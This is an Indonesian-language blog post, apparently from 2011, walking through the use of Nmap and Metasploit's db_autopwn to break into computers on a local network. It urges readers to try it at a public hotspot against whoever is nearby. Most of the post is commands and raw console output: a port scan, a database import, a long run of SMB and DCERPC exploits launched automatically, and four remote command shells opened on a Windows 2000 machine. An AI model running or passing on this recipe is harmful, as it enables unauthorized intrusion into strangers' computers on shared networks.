|
Metasploit Framework ( http://www.metasploit.com )
Nmap ( http://www.insecure.org/nmap )
Metasplot framework, mungkin kalian pernah dengar tentang hal ini suatu tool yang
sangat handal untuk mengeksploitasi target yang kita tuju, biasanya target kita
adalah PC yang sejaringan, oke kita mulai
cobain pas di public hotspot.
coz ini targetnya local network.
mesti punya Metasploit Framework & Nmap.
oke lets pwn someone..!!
msf > nmap -sS 192.168.3.6 -oX nmap.xml
[*] exec: nmap -sS 192.168.3.6 -oX nmap.xml
Starting Nmap 4.11 ( http://www.insecure.org/nmap ) at 2009-11-23 11:25
SE Asia Standard Time
All 1680 scanned ports on 192.168.3.6 are filtered
MAC Address: 00:24:2B:38:FA:5B (Unknown)
Nmap finished: 1 IP address (1 host up) scanned in 51.485 seconds
Penjelasan tentang perintah nmap di atas
msf > load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
msf > db_create test.db
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: test.db[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: test.db
msf > db_import_nmap_xml nmap.xml
msf > db_autopwn -p -e
[*] (4/32): Launching exploit/netware/smb/lsass_cifs against
192.168.3.6:445...
[*] (6/32): Launching exploit/windows/smb/ms06_066_nwwks against
192.168.3.6:445...
[*] Started bind handler
[*] Connecting to the SMB service...
[*] (8/32): Launching exploit/windows/smb/ms04_011_lsass against
192.168.3.6:445...
[*] (9/32): Launching exploit/windows/smb/psexec against
192.168.3.6:445...
[*] Started bind handler
[*] (10/32): Launching exploit/windows/smb/ms08_067_netapi against
192.168.3.6:445...
[*] Started bind handler
[*] Connecting to the server...
[*] Authenticating as user 'Administrator'...
[*] Started bind handler
[*] Binding to e67ab081-9844-3521-9d32-
834f038001c0:1.0@ncacn_np:192.168.3.6[\nwwks] ...
[-] Exploit failed: The server responded with error: STATUS_ACCESS_DENIED
(Command=162 WordCount=0)
[*] (12/32): Launching exploit/windows/smb/ms04_031_netdde against
192.168.3.6:445...
[*] Binding to 3919286a-b10c-11d0-9ba8-
00c04fd92ef5:0.0@ncacn_np:192.168.3.6[\lsarpc]...
[-] Exploit failed: The server responded with error: STATUS_ACCESS_DENIED
(Command=162 WordCount=0)
[*] (14/32): Launching exploit/windows/smb/msdns_zonename against
192.168.3.6:445...
[*] Started bind handler
[*] Started bind handler
[-] Exploit failed: Login Failed: The server responded with error:
STATUS_LOGON_FAILURE (Command=115 WordCount=0)
[*] (15/32): Launching exploit/solaris/samba/lsa_transnames_heap against
192.168.3.6:445...
[*] Started bind handler
[*] Creating nop sled....
[*] (18/32): Launching exploit/multi/samba/nttrans against
192.168.3.6:139...
[*] Automatically detecting the target...
[*] Trying target Windows 2000 SP4...
[*] Binding to 2f5f3220-c126-1076-b549-
074d078619da:1.2@ncacn_np:192.168.3.6[\nddeapi]
[*] (19/32): Launching exploit/windows/smb/ms06_040_netapi against
192.168.3.6:445...
[*] Detected a Windows XP system...
[*] There is no available target for this OS locale
[*] (20/32): Launching exploit/windows/smb/ms05_039_pnp against
192.168.3.6:445...
[*] Started bind handler
[*] Job limit reached, waiting on modules to finish...
[*] Started bind handler
[*] Connecting to the SMB service...
[*] Windows XP SP2 is not exploitable
[*] Binding to 8d9f4e40-a03d-11ce-8f69-
08003e30051b:1.0@ncacn_np:192.168.3.6[\browser] ...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] (22/32): Launching exploit/windows/smb/ms06_066_nwapi against
192.168.3.6:445...
[*] (23/32): Launching exploit/windows/smb/ms03_049_netapi against
192.168.3.6:445...
[*] (24/32): Launching exploit/windows/dcerpc/ms03_026_dcom against
192.168.3.6:135...
[*] Started bind handler
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-
0020af6e7c57:0.0@ncacn_ip_tcp:192.168.3.6[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-
0020af6e7c57:0.0@ncacn_ip_tcp:192.168.3.6[135] ...
[*] (26/32): Launching exploit/windows/brightstor/etrust_itm_alert
against 192.168.3.6:445...
[*] Job limit reached, waiting on modules to finish...
[*] Triggering the vulnerability...
[*] Started bind handler
[*] Binding to 6bffd098-a112-3610-9833-
46c3f87e345a:1.0@ncacn_np:192.168.3.6[\BROWSER] ...
[*] Binding to 3d742890-397c-11cf-9bf1-
00805f88cb72:1.0@ncacn_np:192.168.3.6[\alert] ...
[*] Sending exploit ...
[-] Exploit failed: DCERPC FAULT => nca_s_fault_access_denied
[*] (32/32): Launching exploit/solaris/samba/trans2open against
192.168.3.6:139...
[*] Trying to exploit Samba with address 0x082f2000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-
0123456789ab:0.0@ncacn_np:192.168.3.6[\lsarpc] ...
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Command shell 192.168.3.3:52929 -> 192.168.3.6:10529
2 Command shell 192.168.3.3:50775 -> 192.168.3.6:17887
3 Command shell 192.168.3.3:40985 -> 192.168.3.6:37295
4 Command shell 192.168.3.3:51652 -> 192.168.3.6:37095
msf >sessions -i 1
[*] Starting interaction with 1...
Microsoft Windows 2000 [Version 5.00.2195]
© Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
gotcha !! you're in..
author :xtr0nic
15 Jun 2011
Metasploit - SQLite3 + Nmap autopwn
Labels:
Exploit
Friends Blog
Sponsors :
Best Google Covers | Desktop Wallpaperslk | PSD Graphics
Copyright © 2012. bedegar - All Rights Reserved
Copyright © 2012. bedegar - All Rights Reserved